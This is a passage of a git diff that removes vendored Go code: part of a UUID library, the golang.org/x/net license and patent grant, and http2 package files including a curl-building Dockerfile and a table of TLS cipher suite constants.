the same as returned by String. -func (u UUID) MarshalText() (text []byte, err error) { - text = []byte(u.String()) - return -} - -// UnmarshalText implements the encoding.TextUnmarshaler interface. -// Following formats are supported: -// "6ba7b810-9dad-11d1-80b4-00c04fd430c8", -// "{6ba7b810-9dad-11d1-80b4-00c04fd430c8}", -// "urn:uuid:6ba7b810-9dad-11d1-80b4-00c04fd430c8" -func (u *UUID) UnmarshalText(text []byte) (err error) { - if len(text) < 32 { - err = fmt.Errorf("uuid: UUID string too short: %s", text) - return - } - - t := text[:] - braced := false - - if bytes.Equal(t[:9], urnPrefix) { - t = t[9:] - } else if t[0] == '{' { - braced = true - t = t[1:] - } - - b := u[:] - - for i, byteGroup := range byteGroups { - if i > 0 { - if t[0] != '-' { - err = fmt.Errorf("uuid: invalid string format") - return - } - t = t[1:] - } - - if len(t) < byteGroup { - err = fmt.Errorf("uuid: UUID string too short: %s", text) - return - } - - if i == 4 && len(t) > byteGroup && - ((braced && t[byteGroup] != '}') || len(t[byteGroup:]) > 1 || !braced) { - err = fmt.Errorf("uuid: UUID string too long: %s", text) - return - } - - _, err = hex.Decode(b[:byteGroup/2], t[:byteGroup]) - if err != nil { - return - } - - t = t[byteGroup:] - b = b[byteGroup/2:] - } - - return -} - -// MarshalBinary implements the encoding.BinaryMarshaler interface. -func (u UUID) MarshalBinary() (data []byte, err error) { - data = u.Bytes() - return -} - -// UnmarshalBinary implements the encoding.BinaryUnmarshaler interface. -// It will return error if the slice isn't 16 bytes long. -func (u *UUID) UnmarshalBinary(data []byte) (err error) { - if len(data) != 16 { - err = fmt.Errorf("uuid: UUID must be exactly 16 bytes long, got %d bytes", len(data)) - return - } - copy(u[:], data) - - return -} - -// Value implements the driver.Valuer interface. -func (u UUID) Value() (driver.Value, error) { - return u.String(), nil -} - -// Scan implements the sql.Scanner interface. -// A 16-byte slice is handled by UnmarshalBinary, while -// a longer byte slice or a string is handled by UnmarshalText. -func (u *UUID) Scan(src interface{}) error { - switch src := src.(type) { - case []byte: - if len(src) == 16 { - return u.UnmarshalBinary(src) - } - return u.UnmarshalText(src) - - case string: - return u.UnmarshalText([]byte(src)) - } - - return fmt.Errorf("uuid: cannot convert %T to UUID", src) -} - -// Value implements the driver.Valuer interface. -func (u NullUUID) Value() (driver.Value, error) { - if !u.Valid { - return nil, nil - } - // Delegate to UUID Value function - return u.UUID.Value() -} - -// Scan implements the sql.Scanner interface. -func (u *NullUUID) Scan(src interface{}) error { - if src == nil { - u.UUID, u.Valid = Nil, false - return nil - } - - // Delegate to UUID Scan function - u.Valid = true - return u.UUID.Scan(src) -} - -// FromBytes returns UUID converted from raw byte slice input. -// It will return error if the slice isn't 16 bytes long. -func FromBytes(input []byte) (u UUID, err error) { - err = u.UnmarshalBinary(input) - return -} - -// FromBytesOrNil returns UUID converted from raw byte slice input. -// Same behavior as FromBytes, but returns a Nil UUID on error. -func FromBytesOrNil(input []byte) UUID { - uuid, err := FromBytes(input) - if err != nil { - return Nil - } - return uuid -} - -// FromString returns UUID parsed from string input. -// Input is expected in a form accepted by UnmarshalText. -func FromString(input string) (u UUID, err error) { - err = u.UnmarshalText([]byte(input)) - return -} - -// FromStringOrNil returns UUID parsed from string input. -// Same behavior as FromString, but returns a Nil UUID on error. -func FromStringOrNil(input string) UUID { - uuid, err := FromString(input) - if err != nil { - return Nil - } - return uuid -} - -// Returns UUID v1/v2 storage state. -// Returns epoch timestamp, clock sequence, and hardware address. -func getStorage() (uint64, uint16, []byte) { - storageOnce.Do(initStorage) - - storageMutex.Lock() - defer storageMutex.Unlock() - - timeNow := epochFunc() - // Clock changed backwards since last UUID generation. - // Should increase clock sequence. - if timeNow <= lastTime { - clockSequence++ - } - lastTime = timeNow - - return timeNow, clockSequence, hardwareAddr[:] -} - -// NewV1 returns UUID based on current timestamp and MAC address. -func NewV1() UUID { - u := UUID{} - - timeNow, clockSeq, hardwareAddr := getStorage() - - binary.BigEndian.PutUint32(u[0:], uint32(timeNow)) - binary.BigEndian.PutUint16(u[4:], uint16(timeNow>>32)) - binary.BigEndian.PutUint16(u[6:], uint16(timeNow>>48)) - binary.BigEndian.PutUint16(u[8:], clockSeq) - - copy(u[10:], hardwareAddr) - - u.SetVersion(1) - u.SetVariant() - - return u -} - -// NewV2 returns DCE Security UUID based on POSIX UID/GID. -func NewV2(domain byte) UUID { - u := UUID{} - - timeNow, clockSeq, hardwareAddr := getStorage() - - switch domain { - case DomainPerson: - binary.BigEndian.PutUint32(u[0:], posixUID) - case DomainGroup: - binary.BigEndian.PutUint32(u[0:], posixGID) - } - - binary.BigEndian.PutUint16(u[4:], uint16(timeNow>>32)) - binary.BigEndian.PutUint16(u[6:], uint16(timeNow>>48)) - binary.BigEndian.PutUint16(u[8:], clockSeq) - u[9] = domain - - copy(u[10:], hardwareAddr) - - u.SetVersion(2) - u.SetVariant() - - return u -} - -// NewV3 returns UUID based on MD5 hash of namespace UUID and name. -func NewV3(ns UUID, name string) UUID { - u := newFromHash(md5.New(), ns, name) - u.SetVersion(3) - u.SetVariant() - - return u -} - -// NewV4 returns random generated UUID. -func NewV4() UUID { - u := UUID{} - safeRandom(u[:]) - u.SetVersion(4) - u.SetVariant() - - return u -} - -// NewV5 returns UUID based on SHA-1 hash of namespace UUID and name. -func NewV5(ns UUID, name string) UUID { - u := newFromHash(sha1.New(), ns, name) - u.SetVersion(5) - u.SetVariant() - - return u -} - -// Returns UUID based on hashing of namespace UUID and name. -func newFromHash(h hash.Hash, ns UUID, name string) UUID { - u := UUID{} - h.Write(ns[:]) - h.Write([]byte(name)) - copy(u[:], h.Sum(nil)) - - return u -} diff --git a/vendor/golang.org/x/net/LICENSE b/vendor/golang.org/x/net/LICENSE deleted file mode 100644 index 6a66aea5..00000000 --- a/vendor/golang.org/x/net/LICENSE +++ /dev/null @@ -1,27 +0,0 @@ -Copyright (c) 2009 The Go Authors. All rights reserved. - -Redistribution and use in source and binary forms, with or without -modification, are permitted provided that the following conditions are -met: - - * Redistributions of source code must retain the above copyright -notice, this list of conditions and the following disclaimer. - * Redistributions in binary form must reproduce the above -copyright notice, this list of conditions and the following disclaimer -in the documentation and/or other materials provided with the -distribution. - * Neither the name of Google Inc. nor the names of its -contributors may be used to endorse or promote products derived from -this software without specific prior written permission. - -THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS -"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT -LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR -A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT -OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, -SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT -LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, -DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT -(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE -OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/vendor/golang.org/x/net/PATENTS b/vendor/golang.org/x/net/PATENTS deleted file mode 100644 index 73309904..00000000 --- a/vendor/golang.org/x/net/PATENTS +++ /dev/null @@ -1,22 +0,0 @@ -Additional IP Rights Grant (Patents) - -"This implementation" means the copyrightable works distributed by -Google as part of the Go project. - -Google hereby grants to You a perpetual, worldwide, non-exclusive, -no-charge, royalty-free, irrevocable (except as stated in this section) -patent license to make, have made, use, offer to sell, sell, import, -transfer and otherwise run, modify and propagate the contents of this -implementation of Go, where such license applies only to those patent -claims, both currently owned or controlled by Google and acquired in -the future, licensable by Google that are necessarily infringed by this -implementation of Go. This grant does not include claims that would be -infringed only as a consequence of further modification of this -implementation. If you or your agent or exclusive licensee institute or -order or agree to the institution of patent litigation against any -entity (including a cross-claim or counterclaim in a lawsuit) alleging -that this implementation of Go or any code incorporated within this -implementation of Go constitutes direct or contributory patent -infringement, or inducement of patent infringement, then any patent -rights granted to you under this License for this implementation of Go -shall terminate as of the date such litigation is filed. diff --git a/vendor/golang.org/x/net/http2/Dockerfile b/vendor/golang.org/x/net/http2/Dockerfile deleted file mode 100644 index 53fc5257..00000000 --- a/vendor/golang.org/x/net/http2/Dockerfile +++ /dev/null @@ -1,51 +0,0 @@ -# -# This Dockerfile builds a recent curl with HTTP/2 client support, using -# a recent nghttp2 build. -# -# See the Makefile for how to tag it. If Docker and that image is found, the -# Go tests use this curl binary for integration tests. -# - -FROM ubuntu:trusty - -RUN apt-get update && \ - apt-get upgrade -y && \ - apt-get install -y git-core build-essential wget - -RUN apt-get install -y --no-install-recommends \ - autotools-dev libtool pkg-config zlib1g-dev \ - libcunit1-dev libssl-dev libxml2-dev libevent-dev \ - automake autoconf - -# The list of packages nghttp2 recommends for h2load: -RUN apt-get install -y --no-install-recommends make binutils \ - autoconf automake autotools-dev \ - libtool pkg-config zlib1g-dev libcunit1-dev libssl-dev libxml2-dev \ - libev-dev libevent-dev libjansson-dev libjemalloc-dev \ - cython python3.4-dev python-setuptools - -# Note: setting NGHTTP2_VER before the git clone, so an old git clone isn't cached: -ENV NGHTTP2_VER 895da9a -RUN cd /root && git clone https://github.com/tatsuhiro-t/nghttp2.git - -WORKDIR /root/nghttp2 -RUN git reset --hard $NGHTTP2_VER -RUN autoreconf -i -RUN automake -RUN autoconf -RUN ./configure -RUN make -RUN make install - -WORKDIR /root -RUN wget http://curl.haxx.se/download/curl-7.45.0.tar.gz -RUN tar -zxvf curl-7.45.0.tar.gz -WORKDIR /root/curl-7.45.0 -RUN ./configure --with-ssl --with-nghttp2=/usr/local -RUN make -RUN make install -RUN ldconfig - -CMD ["-h"] -ENTRYPOINT ["/usr/local/bin/curl"] - diff --git a/vendor/golang.org/x/net/http2/Makefile b/vendor/golang.org/x/net/http2/Makefile deleted file mode 100644 index 55fd826f..00000000 --- a/vendor/golang.org/x/net/http2/Makefile +++ /dev/null @@ -1,3 +0,0 @@ -curlimage: - docker build -t gohttp2/curl . - diff --git a/vendor/golang.org/x/net/http2/README b/vendor/golang.org/x/net/http2/README deleted file mode 100644 index 360d5aa3..00000000 --- a/vendor/golang.org/x/net/http2/README +++ /dev/null @@ -1,20 +0,0 @@ -This is a work-in-progress HTTP/2 implementation for Go. - -It will eventually live in the Go standard library and won't require -any changes to your code to use. It will just be automatic. - -Status: - -* The server support is pretty good. A few things are missing - but are being worked on. -* The client work has just started but shares a lot of code - is coming along much quicker. - -Docs are at https://godoc.org/golang.org/x/net/http2 - -Demo test server at https://http2.golang.org/ - -Help & bug reports welcome! - -Contributing: https://golang.org/doc/contribute.html -Bugs: https://golang.org/issue/new?title=x/net/http2:+ diff --git a/vendor/golang.org/x/net/http2/ciphers.go b/vendor/golang.org/x/net/http2/ciphers.go deleted file mode 100644 index 698860b7..00000000 --- a/vendor/golang.org/x/net/http2/ciphers.go +++ /dev/null @@ -1,641 +0,0 @@ -// Copyright 2017 The Go Authors. All rights reserved. -// Use of this source code is governed by a BSD-style -// license that can be found in the LICENSE file. - -package http2 - -// A list of the possible cipher suite ids. Taken from -// http://www.iana.org/assignments/tls-parameters/tls-parameters.txt - -const ( - cipher_TLS_NULL_WITH_NULL_NULL uint16 = 0x0000 - cipher_TLS_RSA_WITH_NULL_MD5 uint16 = 0x0001 - cipher_TLS_RSA_WITH_NULL_SHA uint16 = 0x0002 - cipher_TLS_RSA_EXPORT_WITH_RC4_40_MD5 uint16 = 0x0003 - cipher_TLS_RSA_WITH_RC4_128_MD5 uint16 = 0x0004 - cipher_TLS_RSA_WITH_RC4_128_SHA uint16 = 0x0005 - cipher_TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 uint16 = 0x0006 - cipher_TLS_RSA_WITH_IDEA_CBC_SHA uint16 = 0x0007 - cipher_TLS_RSA_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x0008 - cipher_TLS_RSA_WITH_DES_CBC_SHA uint16 = 0x0009 - cipher_TLS_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0x000A - cipher_TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x000B - cipher_TLS_DH_DSS_WITH_DES_CBC_SHA uint16 = 0x000C - cipher_TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA uint16 = 0x000D - cipher_TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x000E - cipher_TLS_DH_RSA_WITH_DES_CBC_SHA uint16 = 0x000F - cipher_TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0x0010 - cipher_TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x0011 - cipher_TLS_DHE_DSS_WITH_DES_CBC_SHA uint16 = 0x0012 - cipher_TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA uint16 = 0x0013 - cipher_TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x0014 - cipher_TLS_DHE_RSA_WITH_DES_CBC_SHA uint16 = 0x0015 - cipher_TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0x0016 - cipher_TLS_DH_anon_EXPORT_WITH_RC4_40_MD5 uint16 = 0x0017 - cipher_TLS_DH_anon_WITH_RC4_128_MD5 uint16 = 0x0018 - cipher_TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA uint16 = 0x0019 - cipher_TLS_DH_anon_WITH_DES_CBC_SHA uint16 = 0x001A - cipher_TLS_DH_anon_WITH_3DES_EDE_CBC_SHA uint16 = 0x001B - // Reserved uint16 = 0x001C-1D - cipher_TLS_KRB5_WITH_DES_CBC_SHA uint16 = 0x001E - cipher_TLS_KRB5_WITH_3DES_EDE_CBC_SHA uint16 = 0x001F - cipher_TLS_KRB5_WITH_RC4_128_SHA uint16 = 0x0020 - cipher_TLS_KRB5_WITH_IDEA_CBC_SHA uint16 = 0x0021 - cipher_TLS_KRB5_WITH_DES_CBC_MD5 uint16 = 0x0022 - cipher_TLS_KRB5_WITH_3DES_EDE_CBC_MD5 uint16 = 0x0023 - cipher_TLS_KRB5_WITH_RC4_128_MD5 uint16 = 0x0024 - cipher_TLS_KRB5_WITH_IDEA_CBC_MD5 uint16 = 0x0025 - cipher_TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA uint16 = 0x0026 - cipher_TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA uint16 = 0x0027 - cipher_TLS_KRB5_EXPORT_WITH_RC4_40_SHA uint16 = 0x0028 - cipher_TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5 uint16 = 0x0029 - cipher_TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5 uint16 = 0x002A - cipher_TLS_KRB5_EXPORT_WITH_RC4_40_MD5 uint16 = 0x002B - cipher_TLS_PSK_WITH_NULL_SHA uint16 = 0x002C - cipher_TLS_DHE_PSK_WITH_NULL_SHA uint16 = 0x002D - cipher_TLS_RSA_PSK_WITH_NULL_SHA uint16 = 0x002E - cipher_TLS_RSA_WITH_AES_128_CBC_SHA uint16 = 0x002F - cipher_TLS_DH_DSS_WITH_AES_128_CBC_SHA uint16 = 0x0030 - cipher_TLS_DH_RSA_WITH_AES_128_CBC_SHA uint16 = 0x0031 - cipher_TLS_DHE_DSS_WITH_AES_128_CBC_SHA uint16 = 0x0032 - cipher_TLS_DHE_RSA_WITH_AES_128_CBC_SHA uint16 = 0x0033 - cipher_TLS_DH_anon_WITH_AES_128_CBC_SHA uint16 = 0x0034 - cipher_TLS_RSA_WITH_AES_256_CBC_SHA uint16 = 0x0035 - cipher_TLS_DH_DSS_WITH_AES_256_CBC_SHA uint16 = 0x0036 - cipher_TLS_DH_RSA_WITH_AES_256_CBC_SHA uint16 = 0x0037 - cipher_TLS_DHE_DSS_WITH_AES_256_CBC_SHA uint16 = 0x0038 - cipher_TLS_DHE_RSA_WITH_AES_256_CBC_SHA uint16 = 0x0039 - cipher_TLS_DH_anon_WITH_AES_256_CBC_SHA uint16 = 0x003A - cipher_TLS_RSA_WITH_NULL_SHA256 uint16 = 0x003B - cipher_TLS_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0x003C - cipher_TLS_RSA_WITH_AES_256_CBC_SHA256 uint16 = 0x003D - cipher_TLS_DH_DSS_WITH_AES_128_CBC_SHA256 uint16 = 0x003E - cipher_TLS_DH_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0x003F - cipher_TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 uint16 = 0x0040 - cipher_TLS_RSA_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0041 - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0042 - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0043 - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0044 - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0045 - cipher_TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA uint16 = 0x0046 - // Reserved uint16 = 0x0047-4F - // Reserved uint16 = 0x0050-58 - // Reserved uint16 = 0x0059-5C - // Unassigned uint16 = 0x005D-5F - // Reserved uint16 = 0x0060-66 - cipher_TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0x0067 - cipher_TLS_DH_DSS_WITH_AES_256_CBC_SHA256 uint16 = 0x0068 - cipher_TLS_DH_RSA_WITH_AES_256_CBC_SHA256 uint16 = 0x0069 - cipher_TLS_DHE_DSS_WITH_AES_256_CBC_SHA256 uint16 = 0x006A - cipher_TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 uint16 = 0x006B - cipher_TLS_DH_anon_WITH_AES_128_CBC_SHA256 uint16 = 0x006C - cipher_TLS_DH_anon_WITH_AES_256_CBC_SHA256 uint16 = 0x006D - // Unassigned uint16 = 0x006E-83 - cipher_TLS_RSA_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0084 - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0085 - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0086 - cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0087 - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0088 - cipher_TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA uint16 = 0x0089 - cipher_TLS_PSK_WITH_RC4_128_SHA uint16 = 0x008A - cipher_TLS_PSK_WITH_3DES_EDE_CBC_SHA uint16 = 0x008B - cipher_TLS_PSK_WITH_AES_128_CBC_SHA uint16 = 0x008C - cipher_TLS_PSK_WITH_AES_256_CBC_SHA uint16 = 0x008D - cipher_TLS_DHE_PSK_WITH_RC4_128_SHA uint16 = 0x008E - cipher_TLS_DHE_PSK_WITH_3DES_EDE_CBC_SHA uint16 = 0x008F - cipher_TLS_DHE_PSK_WITH_AES_128_CBC_SHA uint16 = 0x0090 - cipher_TLS_DHE_PSK_WITH_AES_256_CBC_SHA uint16 = 0x0091 - cipher_TLS_RSA_PSK_WITH_RC4_128_SHA uint16 = 0x0092 - cipher_TLS_RSA_PSK_WITH_3DES_EDE_CBC_SHA uint16 = 0x0093 - cipher_TLS_RSA_PSK_WITH_AES_128_CBC_SHA uint16 = 0x0094 - cipher_TLS_RSA_PSK_WITH_AES_256_CBC_SHA uint16 = 0x0095 - cipher_TLS_RSA_WITH_SEED_CBC_SHA uint16 = 0x0096 - cipher_TLS_DH_DSS_WITH_SEED_CBC_SHA uint16 = 0x0097 - cipher_TLS_DH_RSA_WITH_SEED_CBC_SHA uint16 = 0x0098 - cipher_TLS_DHE_DSS_WITH_SEED_CBC_SHA uint16 = 0x0099 - cipher_TLS_DHE_RSA_WITH_SEED_CBC_SHA uint16 = 0x009A - cipher_TLS_DH_anon_WITH_SEED_CBC_SHA uint16 = 0x009B - cipher_TLS_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0x009C - cipher_TLS_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0x009D - cipher_TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0x009E - cipher_TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0x009F - cipher_TLS_DH_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0x00A0 - cipher_TLS_DH_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0x00A1 - cipher_TLS_DHE_DSS_WITH_AES_128_GCM_SHA256 uint16 = 0x00A2 - cipher_TLS_DHE_DSS_WITH_AES_256_GCM_SHA384 uint16 = 0x00A3 - cipher_TLS_DH_DSS_WITH_AES_128_GCM_SHA256 uint16 = 0x00A4 - cipher_TLS_DH_DSS_WITH_AES_256_GCM_SHA384 uint16 = 0x00A5 - cipher_TLS_DH_anon_WITH_AES_128_GCM_SHA256 uint16 = 0x00A6 - cipher_TLS_DH_anon_WITH_AES_256_GCM_SHA384 uint16 = 0x00A7 - cipher_TLS_PSK_WITH_AES_128_GCM_SHA256 uint16 = 0x00A8 - cipher_TLS_PSK_WITH_AES_256_GCM_SHA384 uint16 = 0x00A9 - cipher_TLS_DHE_PSK_WITH_AES_128_GCM_SHA256 uint16 = 0x00AA - cipher_TLS_DHE_PSK_WITH_AES_256_GCM_SHA384 uint16 = 0x00AB - cipher_TLS_RSA_PSK_WITH_AES_128_GCM_SHA256 uint16 = 0x00AC - cipher_TLS_RSA_PSK_WITH_AES_256_GCM_SHA384 uint16 = 0x00AD - cipher_TLS_PSK_WITH_AES_128_CBC_SHA256 uint16 = 0x00AE - cipher_TLS_PSK_WITH_AES_256_CBC_SHA384 uint16 = 0x00AF - cipher_TLS_PSK_WITH_NULL_SHA256 uint16 = 0x00B0 - cipher_TLS_PSK_WITH_NULL_SHA384 uint16 = 0x00B1 - cipher_TLS_DHE_PSK_WITH_AES_128_CBC_SHA256 uint16 = 0x00B2 - cipher_TLS_DHE_PSK_WITH_AES_256_CBC_SHA384 uint16 = 0x00B3 - cipher_TLS_DHE_PSK_WITH_NULL_SHA256 uint16 = 0x00B4 - cipher_TLS_DHE_PSK_WITH_NULL_SHA384 uint16 = 0x00B5 - cipher_TLS_RSA_PSK_WITH_AES_128_CBC_SHA256 uint16 = 0x00B6 - cipher_TLS_RSA_PSK_WITH_AES_256_CBC_SHA384 uint16 = 0x00B7 - cipher_TLS_RSA_PSK_WITH_NULL_SHA256 uint16 = 0x00B8 - cipher_TLS_RSA_PSK_WITH_NULL_SHA384 uint16 = 0x00B9 - cipher_TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BA - cipher_TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BB - cipher_TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BC - cipher_TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BD - cipher_TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BE - cipher_TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256 uint16 = 0x00BF - cipher_TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C0 - cipher_TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C1 - cipher_TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C2 - cipher_TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C3 - cipher_TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C4 - cipher_TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256 uint16 = 0x00C5 - // Unassigned uint16 = 0x00C6-FE - cipher_TLS_EMPTY_RENEGOTIATION_INFO_SCSV uint16 = 0x00FF - // Unassigned uint16 = 0x01-55,* - cipher_TLS_FALLBACK_SCSV uint16 = 0x5600 - // Unassigned uint16 = 0x5601 - 0xC000 - cipher_TLS_ECDH_ECDSA_WITH_NULL_SHA uint16 = 0xC001 - cipher_TLS_ECDH_ECDSA_WITH_RC4_128_SHA uint16 = 0xC002 - cipher_TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC003 - cipher_TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA uint16 = 0xC004 - cipher_TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA uint16 = 0xC005 - cipher_TLS_ECDHE_ECDSA_WITH_NULL_SHA uint16 = 0xC006 - cipher_TLS_ECDHE_ECDSA_WITH_RC4_128_SHA uint16 = 0xC007 - cipher_TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC008 - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA uint16 = 0xC009 - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA uint16 = 0xC00A - cipher_TLS_ECDH_RSA_WITH_NULL_SHA uint16 = 0xC00B - cipher_TLS_ECDH_RSA_WITH_RC4_128_SHA uint16 = 0xC00C - cipher_TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC00D - cipher_TLS_ECDH_RSA_WITH_AES_128_CBC_SHA uint16 = 0xC00E - cipher_TLS_ECDH_RSA_WITH_AES_256_CBC_SHA uint16 = 0xC00F - cipher_TLS_ECDHE_RSA_WITH_NULL_SHA uint16 = 0xC010 - cipher_TLS_ECDHE_RSA_WITH_RC4_128_SHA uint16 = 0xC011 - cipher_TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC012 - cipher_TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA uint16 = 0xC013 - cipher_TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA uint16 = 0xC014 - cipher_TLS_ECDH_anon_WITH_NULL_SHA uint16 = 0xC015 - cipher_TLS_ECDH_anon_WITH_RC4_128_SHA uint16 = 0xC016 - cipher_TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA uint16 = 0xC017 - cipher_TLS_ECDH_anon_WITH_AES_128_CBC_SHA uint16 = 0xC018 - cipher_TLS_ECDH_anon_WITH_AES_256_CBC_SHA uint16 = 0xC019 - cipher_TLS_SRP_SHA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC01A - cipher_TLS_SRP_SHA_RSA_WITH_3DES_EDE_CBC_SHA uint16 = 0xC01B - cipher_TLS_SRP_SHA_DSS_WITH_3DES_EDE_CBC_SHA uint16 = 0xC01C - cipher_TLS_SRP_SHA_WITH_AES_128_CBC_SHA uint16 = 0xC01D - cipher_TLS_SRP_SHA_RSA_WITH_AES_128_CBC_SHA uint16 = 0xC01E - cipher_TLS_SRP_SHA_DSS_WITH_AES_128_CBC_SHA uint16 = 0xC01F - cipher_TLS_SRP_SHA_WITH_AES_256_CBC_SHA uint16 = 0xC020 - cipher_TLS_SRP_SHA_RSA_WITH_AES_256_CBC_SHA uint16 = 0xC021 - cipher_TLS_SRP_SHA_DSS_WITH_AES_256_CBC_SHA uint16 = 0xC022 - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 uint16 = 0xC023 - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 uint16 = 0xC024 - cipher_TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 uint16 = 0xC025 - cipher_TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 uint16 = 0xC026 - cipher_TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0xC027 - cipher_TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 uint16 = 0xC028 - cipher_TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 uint16 = 0xC029 - cipher_TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 uint16 = 0xC02A - cipher_TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 uint16 = 0xC02B - cipher_TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 uint16 = 0xC02C - cipher_TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 uint16 = 0xC02D - cipher_TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 uint16 = 0xC02E - cipher_TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0xC02F - cipher_TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0xC030 - cipher_TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 uint16 = 0xC031 - cipher_TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 uint16 = 0xC032 - cipher_TLS_ECDHE_PSK_WITH_RC4_128_SHA uint16 = 0xC033 - cipher_TLS_ECDHE_PSK_WITH_3DES_EDE_CBC_SHA uint16 = 0xC034 - cipher_TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA uint16 = 0xC035 - cipher_TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA uint16 = 0xC036 - cipher_TLS_ECDHE_PSK_WITH_AES_128_CBC_SHA256 uint16 = 0xC037 - cipher_TLS_ECDHE_PSK_WITH_AES_256_CBC_SHA384 uint16 = 0xC038 - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA uint16 = 0xC039 - cipher_TLS_ECDHE_PSK_WITH_NULL_SHA256 uint16 = 0xC03A - 